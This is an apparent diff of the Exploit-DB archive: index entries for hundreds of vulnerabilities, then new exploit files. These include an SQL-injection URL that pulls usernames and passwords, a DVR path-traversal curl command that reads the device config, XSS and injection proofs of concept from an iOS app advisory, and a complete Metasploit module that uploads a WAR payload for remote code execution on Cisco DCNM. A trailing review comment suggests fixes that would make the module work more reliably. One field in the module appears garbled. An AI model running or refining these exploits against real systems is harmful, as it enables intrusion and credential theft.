29924,platforms/hardware/webapps/29924.txt,"TP-Link TD-8840t - CSRF Vulnerability",2013-11-30,"mohammed al-saggaf",hardware,webapps,0
29925,platforms/php/webapps/29925.txt,"Kleeja Upload Center Script - CRLF Injection",2013-11-30,"terminator ashiyane",php,webapps,0
29926,platforms/windows/dos/29926.pl,"Audacious Player 3.4.2/3.4.1 - (.mp3) - Crash POC",2013-11-30,"Akin Tosunlar",windows,dos,0
29926,platforms/windows/dos/29926.pl,"Audacious Player 3.4.2/3.4.1 - (.mp3) - Crash PoC",2013-11-30,"Akin Tosunlar",windows,dos,0
29927,platforms/hardware/webapps/29927.txt,"Scientific-Atlanta, Inc. DPR2320R2 - Multiple CSRF vulnerability",2013-11-30,sajith,hardware,webapps,0
29928,platforms/windows/local/29928.c,"BZR Player 0.97 (codec_mpeg.dll) - DLL Hijacking Vulnerability",2013-11-30,"Akin Tosunlar",windows,local,0
29929,platforms/asp/webapps/29929.txt,"Burak Yilmaz Blog 1.0 BRY.ASP SQL Injection Vulnerability",2007-04-26,RMx,asp,webapps,0
@ -26896,7 +26887,7 @@ id,file,description,date,author,platform,type,port
29932,platforms/linux/remote/29932.txt,"Red Hat Directory Server 7.1 Multiple Cross Site Scripting Vulnerabilities",2007-04-30,"Kaushal Desai",linux,remote,0
29933,platforms/asp/webapps/29933.txt,"Gazi Download Portal Down_Indir.ASP SQL Injection Vulnerability",2007-04-30,ertuqrul,asp,webapps,0
29934,platforms/windows/dos/29934.py,"ZIP Password Recovery Professional 5.1 (.zip) - Crash POC",2013-11-30,KAI,windows,dos,0
29935,platforms/php/webapps/29935.php,"MyBB Exploit",2013-11-30,BlackDream,php,webapps,0
29935,platforms/php/webapps/29935.php,"MyBB <= 1.6.11 - Remote Code Execution Using Admin Privileges",2013-11-30,BlackDream,php,webapps,0
29936,platforms/windows/local/29936.c,"Hex Workshop 6.7 (mfc100trk.dll) - DLL Hijacking (0-day)",2013-12-01,"Akin Tosunlar",windows,local,0
29937,platforms/windows/dos/29937.txt,"Aventail Connect 4.1.2.13 Hostname Remote Buffer Overflow Vulnerability",2007-04-30,"Thomas Pollet",windows,dos,0
29938,platforms/php/webapps/29938.txt,"E-Annu Home.PHP SQL Injection Vulnerability",2007-04-30,ilkerkandemir,php,webapps,0
@ -26908,8 +26899,67 @@ id,file,description,date,author,platform,type,port
29944,platforms/php/webapps/29944.pl,"PHPSecurityAdmin 4.0.2 Logout.PHP Remote File Include Vulnerability",2007-05-03,"ilker Kandemir",php,webapps,0
29945,platforms/hardware/remote/29945.txt,"D-Link DSL-G624T Var:RelaodHref Cross-Site Scripting Vulnerability",2007-05-03,"Tim Brown",hardware,remote,0
29946,platforms/php/webapps/29946.txt,"Wordpress Orange Themes CSRF File Upload Vulnerability",2013-12-01,"Jje Incovers",php,webapps,0
29947,platforms/php/webapps/29947.txt,"Joomla com_alphauserpoints Remote Code Execution",2013-12-01,DevilScreaM,php,webapps,0
29948,platforms/php/webapps/29948.txt,"Joomla com_alphacontent Remote Code Execution",2013-12-01,DevilScreaM,php,webapps,0
29949,platforms/windows/dos/29949.c,"Multiple Vendors Zoo Compression Algorithm Remote Denial of Service Vulnerability",2007-05-04,Jean-Sébastien,windows,dos,0
29950,platforms/osx/local/29950.js,"Apple <= 2.0.4 Safari Unspecified Local Vulnerability",2007-05-04,poplix,osx,local,0
29951,platforms/windows/remote/29951.txt,"Microsoft SharePoint Server 3.0 Cross-Site Scripting Vulnerability",2007-05-04,Solarius,windows,remote,0
29952,platforms/windows/remote/29952.html,"Sienzo Digital Music Mentor DSKernel2.DLL ActiveX Control Stack Buffer Overflow Vulnerabilities",2007-05-07,shinnai,windows,remote,0
29953,platforms/php/webapps/29953.txt,"PHP Content Architect 0.9 pre 1.2 MFA_Theme.PHP Remote File Include Vulnerability",2007-05-07,kezzap66345,php,webapps,0
29954,platforms/linux/local/29954.txt,"ELinks Relative 0.10.6 /011.1 Path Arbitrary Code Execution Vulnerability",2007-05-07,"Arnaud Giersch",linux,local,0
29955,platforms/php/webapps/29955.txt,"WF-Quote 1.0 Xoops Module Index.PHP SQL Injection Vulnerability",2007-05-07,Bulan,php,webapps,0
29956,platforms/php/webapps/29956.txt,"ObieWebsite Mini Web Shop 2 order_form.php PATH_INFO Parameter XSS",2007-05-02,CorryL,php,webapps,0
29957,platforms/php/webapps/29957.txt,"ObieWebsite Mini Web Shop 2 sendmail.php PATH_INFO Parameter XSS",2007-05-02,CorryL,php,webapps,0
29958,platforms/asp/webapps/29958.txt,"FipsCMS 2.1 PID Parameter SQL Injection Vulnerability",2007-05-07,"ilker Kandemir",asp,webapps,0
29959,platforms/hardware/webapps/29959.txt,"TVT TD-2308SS-B DVR - Directory Traversal Vulnerability",2013-12-01,"Cesar Neira",hardware,webapps,0
29960,platforms/php/webapps/29960.txt,"TurnkeyWebTools SunShop Shopping Cart 4.0 index.php Multiple Parameter SQL Injection",2007-05-07,"John Martinelli",php,webapps,0
29961,platforms/php/webapps/29961.txt,"TurnkeyWebTools SunShop Shopping Cart 4.0 index.php l Parameter XSS",2007-05-07,"John Martinelli",php,webapps,0
29962,platforms/cgi/webapps/29962.txt,"OTRS 2.0.4 Index.PL Cross-Site Scripting Vulnerability",2007-05-07,ciri,cgi,webapps,0
29963,platforms/php/webapps/29963.txt,"Kayako eSupport 3.0.90 Index.PHP Cross-Site Scripting Vulnerability",2007-05-07,Red_Casper,php,webapps,0
29964,platforms/windows/remote/29964.rb,"Trend Micro ServerProtect 5.58 SpntSvc.EXE Remote Stack Based Buffer Overflow Vulnerability",2007-05-07,MC,windows,remote,0
29965,platforms/php/webapps/29965.txt,"Advanced Guestbook 2.4.2 Picture.PHP Cross-Site Scripting Vulnerability",2007-05-08,"Jesper Jurcenoks",php,webapps,0
29966,platforms/php/webapps/29966.txt,"Campsite 2.6.1 Alias.php g_documentRoot Parameter Remote File Inclusion",2007-05-08,Anonymous,php,webapps,0
29967,platforms/php/webapps/29967.txt,"Campsite 2.6.1 Article.php g_documentRoot Parameter Remote File Inclusion",2007-05-08,Anonymous,php,webapps,0
29968,platforms/php/webapps/29968.txt,"Campsite 2.6.1 ArticleAttachment.php g_documentRoot Parameter Remote File Inclusion",2007-05-08,Anonymous,php,webapps,0
29969,platforms/php/webapps/29969.txt,"Campsite 2.6.1 ArticleComment.php g_documentRoot Parameter Remote File Inclusion",2007-05-08,Anonymous,php,webapps,0
29970,platforms/php/webapps/29970.txt,"Campsite 2.6.1 ArticleData.php g_documentRoot Parameter Remote File Inclusion",2007-05-08,Anonymous,php,webapps,0
29971,platforms/php/webapps/29971.txt,"Campsite 2.6.1 ArticleImage.php g_documentRoot Parameter Remote File Inclusion",2007-05-08,Anonymous,php,webapps,0
29972,platforms/php/webapps/29972.txt,"Campsite 2.6.1 ArticleIndex.php g_documentRoot Parameter Remote File Inclusion",2007-05-08,Anonymous,php,webapps,0
29973,platforms/php/webapps/29973.txt,"Campsite 2.6.1 ArticlePublish.php g_documentRoot Parameter Remote File Inclusion",2007-05-08,Anonymous,php,webapps,0
29974,platforms/php/webapps/29974.txt,"Campsite 2.6.1 ArticleTopic.php g_documentRoot Parameter Remote File Inclusion",2007-05-08,Anonymous,php,webapps,0
29975,platforms/php/webapps/29975.txt,"Campsite 2.6.1 ArticleType.php g_documentRoot Parameter Remote File Inclusion",2007-05-08,Anonymous,php,webapps,0
29976,platforms/php/webapps/29976.txt,"Campsite 2.6.1 ArticleTypeField.php g_documentRoot Parameter Remote File Inclusion",2007-05-08,Anonymous,php,webapps,0
29977,platforms/php/webapps/29977.txt,"Campsite 2.6.1 Country.php g_documentRoot Parameter Remote File Inclusion",2007-05-08,Anonymous,php,webapps,0
29978,platforms/php/webapps/29978.txt,"Campsite 2.6.1 DatabaseObject.php g_documentRoot Parameter Remote File Inclusion",2007-05-08,Anonymous,php,webapps,0
29979,platforms/php/webapps/29979.txt,"Campsite 2.6.1 Event.php g_documentRoot Parameter Remote File Inclusion",2007-05-08,Anonymous,php,webapps,0
29980,platforms/php/webapps/29980.txt,"Campsite 2.6.1 IPAccess.php g_documentRoot Parameter Remote File Inclusion",2007-05-08,Anonymous,php,webapps,0
29981,platforms/php/webapps/29981.txt,"Campsite 2.6.1 Image.php g_documentRoot Parameter Remote File Inclusion",2007-05-08,Anonymous,php,webapps,0
29982,platforms/php/webapps/29982.txt,"Campsite 2.6.1 Issue.php g_documentRoot Parameter Remote File Inclusion",2007-05-08,Anonymous,php,webapps,0
29983,platforms/php/webapps/29983.txt,"Campsite 2.6.1 IssuePublish.php g_documentRoot Parameter Remote File Inclusion",2007-05-08,Anonymous,php,webapps,0
29984,platforms/php/webapps/29984.txt,"Campsite 2.6.1 Language.php g_documentRoot Parameter Remote File Inclusion",2007-05-08,Anonymous,php,webapps,0
29985,platforms/php/webapps/29985.txt,"Campsite 2.6.1 Log.php g_documentRoot Parameter Remote File Inclusion",2007-05-08,Anonymous,php,webapps,0
29986,platforms/php/webapps/29986.txt,"Campsite 2.6.1 LoginAttempts.php g_documentRoot Parameter Remote File Inclusion",2007-05-08,Anonymous,php,webapps,0
29987,platforms/php/webapps/29987.txt,"Campsite 2.6.1 Publication.php g_documentRoot Parameter Remote File Inclusion",2007-05-08,Anonymous,php,webapps,0
29988,platforms/php/webapps/29988.txt,"Campsite 2.6.1 Section.php g_documentRoot Parameter Remote File Inclusion",2007-05-08,Anonymous,php,webapps,0
29989,platforms/php/webapps/29989.txt,"Campsite 2.6.1 ShortURL.php g_documentRoot Parameter Remote File Inclusion",2007-05-08,Anonymous,php,webapps,0
29990,platforms/php/webapps/29990.txt,"Campsite 2.6.1 Subscription.php g_documentRoot Parameter Remote File Inclusion",2007-05-08,Anonymous,php,webapps,0
29991,platforms/php/webapps/29991.txt,"Campsite 2.6.1 SubscriptionDefaultTime.php g_documentRoot Parameter Remote File Inclusion",2007-05-08,Anonymous,php,webapps,0
29992,platforms/php/webapps/29992.txt,"Campsite 2.6.1 SubscriptionSection.php g_documentRoot Parameter Remote File Inclusion",2007-05-08,Anonymous,php,webapps,0
29993,platforms/php/webapps/29993.txt,"Campsite 2.6.1 SystemPref.php g_documentRoot Parameter Remote File Inclusion",2007-05-08,Anonymous,php,webapps,0
29994,platforms/php/webapps/29994.txt,"Campsite 2.6.1 Template.php g_documentRoot Parameter Remote File Inclusion",2007-05-08,Anonymous,php,webapps,0
29995,platforms/php/webapps/29995.txt,"Campsite 2.6.1 TimeUnit.php g_documentRoot Parameter Remote File Inclusion",2007-05-08,Anonymous,php,webapps,0
29996,platforms/php/webapps/29996.txt,"Campsite 2.6.1 Topic.php g_documentRoot Parameter Remote File Inclusion",2007-05-08,Anonymous,php,webapps,0
29997,platforms/php/webapps/29997.txt,"Campsite 2.6.1 UrlType.php g_documentRoot Parameter Remote File Inclusion",2007-05-08,Anonymous,php,webapps,0
29998,platforms/php/webapps/29998.txt,"Campsite 2.6.1 User.php g_documentRoot Parameter Remote File Inclusion",2007-05-08,Anonymous,php,webapps,0
29999,platforms/php/webapps/29999.txt,"Campsite 2.6.1 UserType.php g_documentRoot Parameter Remote File Inclusion",2007-05-08,Anonymous,php,webapps,0
30000,platforms/hardware/webapps/30000.txt,"Photo Transfer Wifi 1.4.4 iOS - Multiple Web Vulnerabilities",2013-12-02,Vulnerability-Lab,hardware,webapps,0
30002,platforms/php/webapps/30002.txt,"Wordpress Formcraft Plugin - SQL Injection Vulnerability",2013-12-02,"Ashiyane Digital Security Team",php,webapps,0
30003,platforms/php/webapps/30003.txt,"Campsite 2.6.1 implementation/management/configuration.php g_documentRoot Parameter Remote File Inclusion",2007-05-08,Anonymous,php,webapps,0
30004,platforms/php/webapps/30004.txt,"Campsite 2.6.1 implementation/management/db_connect.php g_documentRoot Parameter Remote File Inclusion",2007-05-08,Anonymous,php,webapps,0
30005,platforms/php/webapps/30005.txt,"Campsite 2.6.1 LocalizerConfig.php g_documentRoot Parameter Remote File Inclusion",2007-05-08,Anonymous,php,webapps,0
30006,platforms/php/webapps/30006.txt,"Campsite 2.6.1 LocalizerLanguage.php g_documentRoot Parameter Remote File Inclusion",2007-05-08,Anonymous,php,webapps,0
30007,platforms/windows/local/30007.txt,"Notepad++ Plugin Notepad# 1.5 - Local Exploit",2013-12-03,"Junwen Sun",windows,local,0
30008,platforms/java/remote/30008.rb,"Cisco Prime Data Center Network Manager Arbitrary File Upload",2013-12-03,metasploit,java,remote,0
30009,platforms/windows/remote/30009.rb,"ABB MicroSCADA wserver.exe Remote Code Execution",2013-12-03,metasploit,windows,remote,12221
30010,platforms/php/remote/30010.rb,"Kimai v0.9.2 'db_restore.php' SQL Injection",2013-12-03,metasploit,php,remote,80
30011,platforms/windows/remote/30011.rb,"Microsoft Tagged Image File Format (TIFF) Integer Overflow",2013-12-03,metasploit,windows,remote,0
30012,platforms/php/webapps/30012.txt,"Chamilo LMS 1.9.6 (profile.php, password0 param) - SQL Injection",2013-12-03,"High-Tech Bridge SA",php,webapps,80
30013,platforms/php/webapps/30013.txt,"Dokeos 2.2 RC2 (index.php, language param) - SQL Injection",2013-12-03,"High-Tech Bridge SA",php,webapps,80



@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/23850/info
fipsCMS is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database implementation.
fipsCMS 2.1 and prior versions are vulnerable to this issue.
http://www.example.com/home/index.asp?pid='/**/union/**/select/**/0,username,password,3,4,5,6,7,8,9/**/from/**/pidRoot/**/


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/23862/info
OTRS is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
This issue affects OTRS 2.0.4; other versions may also be affected.
http://www.example.com/server/otre/index/pl?Action=AgentTicketMailbox&Subaction=[xss]


@ -0,0 +1,47 @@
# Exploit Title: TVT TD-2308SS-B DVR directory traversal
# Shodan Dork: "Cross Web Server"
# Date: 01 Dec 2013
# Disclosure date: 10 Sep 2013
# Exploit Author: Cesar Neira
# Vendor Homepage: http://en.tvt.net.cn/
# Affected Firmware Versions:
3.1.43.B
3.1.43.P
3.1.6.P-1.0.2.1-03
3.1.75.B-1.0.2.1-00
3.1.7.B-1.0.2.1-00
3.1.81.B-1.0.2.1-00
3.1.83.B-1.0.2.1-00
3.1.83.P-1.0.4.2-03
3.1.87.P-1.0.4.2-17
3.1.91.P-1.0.2.1-03
3.1.92.P-1.0.2.1-00
3.1.93.B-1.0.2.1-17
3.2.0.B-1.0.2.1-17
3.2.0.P-1.0.2.1-03
3.2.0.P-1.0.2.1-17
3.2.0.P-1.0.6.0.32-00
3.2.0.P-3520A-00
3.2.0.P-3520A-03
3.2.0.P-3531-00
3.2.0.P-3531-11
3.2.0.P-FH-00
3.2.9.P-3520A-06
maybe others.
# Tested on: TVT DVR TD-2308SS-B
# CVE : CVE-2013-6023
# References:
http://www.kb.cert.org/vuls/id/785838
http://alguienenlafisi.blogspot.com/2013/10/dvr-tvt-directory-traversal.html
POC:
curl http://[IP Address]/../../../mnt/mtd/config/config.dat 2>/dev/null | strings
--
Cesar Neira <csar.1603@gmail.com>
http://alguienenlafisi.blogspot.com
Root-Node
Exploit: http://www.exploit-db.com/sploits/29959.nse


@ -0,0 +1,313 @@
Document Title:
===============
Photo Transfer Wifi 1.4.4 iOS - Multiple Web Vulnerabilities
References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1153
Release Date:
=============
2013-12-02
Vulnerability Laboratory ID (VL-ID):
====================================
1153
Common Vulnerability Scoring System:
====================================
9.1
Product & Service Introduction:
===============================
nsfer WiFi app is a straight and effortless way to transfer your photos and videos between iPhones, iPads
and computers. Forget about hassle with transferring your media via iTunes, iCloud. Features:
- Send photos and videos from iPhone or iPod Touch to other iPhone with a simple drag and drop
- Transfer media from your PC or Mac to iPhone or iPod Touch
- Download photos and videos to your Computer from iPhone, iPod Touch, iPad and iPad Mini
- Copy photos and videos from Computer to iPad or iPad Mini
- Import HD videos to iPad or iPad Mini from iPhone
- Exchange photos and videos between iPads over your local WiFi network
- Make your pictures accessible from your iPhone or iPod Touch to other users on the same WiFi network
- Share you media files on iPad or iPad Mini
- Browse photos and videos shared on iDevices from any PC or Mac
- Download shared media to your Computer
- Receive photos and videos to iPhone or iPod Touch from iPad
- Preview shared photos and videos in any browser
- Use browser to download shared photos and videos from iDevices
- Send photos and videos from any browser to your iPhone or iPad
(Copy of the Homepage: https://itunes.apple.com/en/app/photo-transfer-wifi-quickly/id674978018 )
Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered multiple web vulnerabilities in the Photo Transfer WiFi v1.4.4 for apple iOS.
Vulnerability Disclosure Timeline:
==================================
2013-12-02: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Affected Product(s):
====================
Simplex Solutions Inc
Product: Photo Transfer WiFi 1.4.4
Exploitation Technique:
=======================
Remote
Severity Level:
===============
Critical
Technical Details & Description:
================================
1.1
2 local command/path injection web vulnerabilities has been discovered in the Simplex Solutions Inc Photo Transfer WiFi v1.4.4 for apple iOS.
The remote web vulnerability allows to inject local commands via vulnerable system values to compromise the apple mobile iOS application.
The vulnerability is located in the in the device name value of the index and sub category list module. Local attackers are
able to inject own script codes as iOS device name. The execute of the injected script code occurs in 2 different section with
persistent attack vector. The first section is the wifi app interface login were the application is listed. The secound execute
occurs after the login in the smallheader interface section.The security risk of the command/path inject vulnerabilities are
estimated as high(+) with a cvss (common vulnerability scoring system) count of 7.2(+)|(-)7.3.
Exploitation of the command/path inject vulnerability requires a local low privileged iOS device account with restricted access
and no direct user interaction. Successful exploitation of the vulnerability results in unauthorized execute of system specific
commands or unauthorized path requests.
Vulnerable Application(s):
[+] Photo Transfer Wifi v1.4.4
Vulnerable Parameter(s):
[+] devicename
Affected Module(s):
[+] Login - Device Name
[+] Index - Device Name
1.2
A persistent input validation web vulnerability has been discovered in the Simplex Solutions Inc Photo Transfer WiFi v1.4.4 for apple iOS.
The validation web vulnerability allows remote attackers to inject own malicious script codes by a persistent (application-side) attack vector.
The persistent input validation vulnerability is located in the album name value of the mobile application. Remote attackers and local low
privileged user accounts can inject own malicious persistent script codes as album name. The execute occurs in the main index album name list
and the sub category list. By exchange of the information the issue can be exploited by remote attackers by a low user interaction sync.
The security risk of the persistent vulnerabilities are estimated as medium(+) with a cvss (common vulnerability scoring system) count of 4.6(+).
Exploitation of the persistent web vulnerability requires no or a local low privileged mobile application account and low user interaction.
Successful exploitation of the vulnerability can lead to persistent session hijacking (customers), account steal via persistent web attacks,
persistent phishing or persistent module context manipulation.
Vulnerable Application(s):
[+] Photo Transfer Wifi v1.4.4
Vulnerable Parameter(s):
[+] albumname
Affected Module(s):
[+] Index - Album Name List
Proof of Concept (PoC):
=======================
1.1
The local command/path inject web vulnerability via devicename value can be exploited by local low privileged or restricted device
user accounts & no user interaction. For security demonstration or to reproduce the command/path mobile app vulnerability follow
the provided information and steps below.
Manual steps to exploit the vulnerability ...
1. Install the photo transfer wifi iOS mobile application
2. Open the iOS settings and switch to the info > device name input
3. Include your name and the payload to execute an app command or request a local device path (">%20<x src=\..\<../var/mobile/Library/[APP PATH]/">)
4. Save the input and open the photo transfer wifi app
Note: After the startup the web-server is available
5. Open the url following url to the web interface of the mobile application (http://localhost:8080)
6. The first execute occurs in the error message with the devicename value of the login
7. Successful reproduce of the first vulnerability done ... let us watch now the secound issue of the devicename after the login
8. Exclude in the iOS device settings the payload, save and open the service via web-server http request
9. Login to the interface with the default username
10. The execute of the command or path request occurs after the login in the devicename value
11. Successful reproduce of the secound vulnerability done!
PoC: Login > devicepreview - devicename
<div class="errormessage">
Invalid password. Try again!
</div>
<div class="youconnect">
You are now connecting to
</div>
<div class="devicepreview">
<div class="devicepreviewInternal">
<p class="devicename">
device bkm>"<<>"<x src="login_incorrect_files/">%20<x src=\..\<../var/mobile/Library/[APP PATH]/">
</p>
<div class='deviceico'>
<img src="/devices_ico/iPadB.png">
</div>
</div>
</div>
<form method="POST" action="/login">
<div class='forminputs'>
<input type="password" name="password" class='passinput' placeholder='Enter Password' id="login_input">
<input type="submit" value="Connect" class='passsubmit'>
</div>
</form>
Note: The injected command or path request execute occurs in the login and error message module.
PoC: Index - smallheader > devicename
<body>
<div class="smallheader">
<img src="web/logo_small.png" style="float:left">
<div class="devicepreview" style="float:right">
<div class="devicepreviewInternal">
<p class="devicename">
device bkm ">%20<x src=\..\<../var/mobile/Library/[APP PATH]/>
</p>
<div class="deviceico">
<img src="/devices_ico/iPadB.png">
</div>
</div>
</div>
</div>
Note: The secound inject/execute is located after the login in the `smallheader` class were the devicename will be visible.
Reference(s):
http://localhost:8080/
1.2
The persistent input validation web vulnerability can be exploited by remote attackers with low privileged web-application user account
and low user interaction. For security demonstration or to reproduce the vulnerability follow the information and steps below.
Manual steps to reproduce the vulnerability ...
1. Install the photo transfer wifi mobile app
2. Open the iOS photo app (default software)
3. Add a new album and inject into the album name your own script code (payload)
4. Open the photo transfer wifi mobile app
5. Go to the local web-server url (localhost:8080)
Note: After the login to the interface the index displays an album name listing
6. The script code execute occurs with persistent attack vector in the index album name list context
7. Successful reproduce of the vulnerability done!
PoC: Gallery > Album - albumtitle
<div class="albumtitle">
<><[PERSISTENT INJECTED SCRIPT CODE IN ALBUM NAME VALUE VIA POST METHOD INJECT!]>
</div>
<div class="albumsize">
3 Items
</div>
</a><div class="ziploaddiv"><a href="http://localhost:8080/gallery/album/?albumtitle=WallpapersHD&
album=assets-library%3A%2F%2Fgroup%2F%3Fid%3DC44B3062-3A67-4BFA-AF16-04CC8DE2CD29&partial=0" class="interceptme">
</a><a href="http://192.168.2.106:8080/gallery/zip_album/WallpapersHD.zip?album=assets-library%3A%2F%2Fgroup%2F%3Fid%3DC44B3062-
3A67-4BFA-AF16-04CC8DE2CD29" class="zipload" target="_blank">
<img src="localhost8080_files/download.png" class="ziploadimg" width="36px">
</a>
<div class="ziploadtext">
</div>
</div>
</div>
Note: The issue can be exploited by local privileged user accounts in the iOS photo app (default) or by a remote attacker via album to file sync.
(interceptme!? ;)
Reference(s):
http://localhost:8080/gallery/album/?albumtitle=[ALBUM-NAME]
Solution - Fix & Patch:
=======================
1.1
The command/path inject web vulnerabilities can be patched by a secure encode and parse of the devicename value.
Parse the devicename in the login section and in the smallheader class to devicename.
1.2
The persistent input validation web vulnerability can be patched by a secure parse and encode of the album name value.
All GET requests with the value and the input by sync needs to be filtered by a secure mechanism.
Security Risk:
==============
1.1
The security risk of the local command/path inject web vulnerabilities are estimated as high.
1.2
The security risk of the persistent album name web vulnerability is estimated as medium(+).
Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties,
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business
profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some
states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation
may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases
or trade with fraud/stolen material.
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
Section: www.vulnerability-lab.com/dev - forum.vulnerability-db.com - magazine.vulnerability-db.com
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and
other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed),
modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.
Copyright ? 2013 | Vulnerability Laboratory [Evolution Security]
--
VULNERABILITY LABORATORY RESEARCH TEAM
DOMAIN: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com

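--- a/platforms/java/remote/30008.rb
+++ b/platforms/java/remote/30008.rb
@@ -0,0 +1,153 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+require 'msf/core'
+class Metasploit3 < Msf::Exploit::Remote
+Rank = ExcellentRanking
+include Msf::Exploit::Remote::HttpClient
+include Msf::Exploit::FileDropper
+def initialize(info = {})
+super(update_info(info,
+'Name' => 'Cisco Prime Data Center Network Manager Arbitrary File Upload',
+'Description' => %q{
+This module exploits a code execution flaw in Cisco Data Center Network Manager. The
+vulnerability exists in processImageSave.jsp, which can be abused through a directory
+traversal and a null byte injection to upload arbitrary files. The autodeploy JBoss
+application server feature is used to achieve remote code execution. This module has been
+tested successfully on Cisco Prime Data Center Network Manager 6.1(2) on Windows 2008 R2
+(64 bits).
+},
+'Author' =>
+[
+'rgod <rgod[at]autistici.org>', # Vulnerability discovery
+'juan vazquez' # Metasploit module
+],
+'License' => MSF_LICENSE,
+'References' =>
+[
+[ 'CVE', '2013-5486'],
+[ 'OSVDB', '97426' ],
+[ 'ZDI', '13-254' ],
+[ 'URL', 'http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20130918-dcnm' ]
+],
+'Privileged' => true,
+'Platform' => 'java',
+'Arch' => ARCH_JAVA,
+'Targets' =>
+[
+[ 'Cisco DCNM 6.1(2) / Java Universal',
+{
+'AutoDeployPath' => "../../../../../deploy",
+'CleanupPath' => "../../jboss-4.2.2.GA/server/fm/deploy"
+}
+]
+],
+'DefaultTarget' => 0,
+'DisclosureDate' => 'Sep 18 2013'))
+register_options(
+[
+OptString.new('TARGETURI', [true, 'Path to Cisco DCNM', '/']),
+OptInt.new('ATTEMPTS', [true, 'The number of attempts to execute the payload (auto deployed by JBoss)', 10])
+], self.class)
+end
+def upload_file(location, filename, contents)
+res = send_request_cgi(
+{
+'uri' => normalize_uri(target_uri.path, "cues_utility", "charts", "processImageSave.jsp"),
+'method' => 'POST',
+'encode_params' => false,
+'vars_post' =>
+{
+"mode" => "save",
+"savefile" => "true",
+"chartid" => "#{location}/#(unknown)%00",
+"data" => Rex::Text.uri_encode(Rex::Text.encode_base64(contents))
+}
+})
+if res and res.code == 200 and res.body.to_s =~ /success/
+return true
+else
+return false
+end
+end
+def check
+version = ""
+res = send_request_cgi({
+'url' => target_uri.to_s,
+'method' => 'GET'
+})
+unless res
+return Exploit::CheckCode::Unknown
+end
+if res.code == 200 and
+res.body.to_s =~ /Data Center Network Manager/ and
+res.body.to_s =~ /<div class="productVersion">Version: (.*)<\/div>/
+version = $1
+print_status("Cisco Primer Data Center Network Manager version #{version} found")
+elsif res.code == 200 and
+res.body.to_s =~ /Data Center Network Manager/
+return Exploit::CheckCode::Detected
+else
+return Exploit::CheckCode::Safe
+end
+if version =~ /6\.1/
+return Exploit::CheckCode::Vulnerable
+end
+return Exploit::CheckCode::Safe
+end
+def exploit
+attempts = datastore['ATTEMPTS']
+fail_with(Failure::BadConfig, "#{peer} - Configure 1 or more ATTEMPTS") unless attempts > 0
+app_base = rand_text_alphanumeric(4+rand(32-4))
+# By default uploads land here: C:\Program Files\Cisco Systems\dcm\jboss-4.2.2.GA\server\fm\tmp\deploy\tmp3409372432509144123dcm-exp.war\cues_utility\charts
+# Auto deploy dir is here C:\Program Files\Cisco Systems\dcm\jboss-4.2.2.GA\server\fm\deploy
+# Sessions pwd is here C:\Program Files\Cisco Systems\dcm\fm\bin
+war = payload.encoded_war({ :app_name => app_base }).to_s
+war_filename = "#{app_base}.war"
+war_location = target['AutoDeployPath']
+print_status("#{peer} - Uploading WAR file #{war_filename}...")
+res = upload_file(war_location, war_filename, war)
+if res
+register_files_for_cleanup("#{target['CleanupPath']}/#{war_filename}")
+else
+fail_with(Failure::Unknown, "#{peer} - Failed to upload the WAR payload")
+end
+attempts.times do
+select(nil, nil, nil, 2)
+# Now make a request to trigger the newly deployed war
+print_status("#{peer} - Attempting to launch payload in deployed WAR...")
+res = send_request_cgi(
+{
+'uri' => normalize_uri(target_uri.path, app_base, Rex::Text.rand_text_alpha(rand(8)+8)),
+'method' => 'GET'
+})
+# Failure. The request timed out or the server went away.
+fail_with(Failure::TimeoutExpired, "#{peer} - The request timed out or the server went away.") if res.nil?
+# Success! Triggered the payload, should have a shell incoming
+break if res.code == 200
+end
+end
+end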
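Review bot: In `check`, the probe request passes `'url' => target_uri.to_s`, whereas `upload_file` and `exploit` in the same file use the `'uri'` key that the HttpClient mixin reads; the unrecognized `'url'` key is silently dropped, so the version probe goes to the client's default path instead of the configured TARGETURI and `check` can report Safe or Unknown against a deployment served under a non-root path. Change it to `'uri' => normalize_uri(target_uri.path),` to match the other two requests. The `print_status` message on the following line also reads "Cisco Primer" where "Cisco Prime" is meant. As rendered, `upload_file` never uses its `filename` argument — the `chartid` value shows `#(unknown)` where an interpolation of `filename` would be expected — which may be an artifact of this page rather than the file itself, but is worth confirming against the source.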


@ -3,6 +3,7 @@ Ametys CMS 3.5.2 (lang parameter) XPath Injection Vulnerability
Vendor: Anyware Services
Product web page: http://www.ametys.org
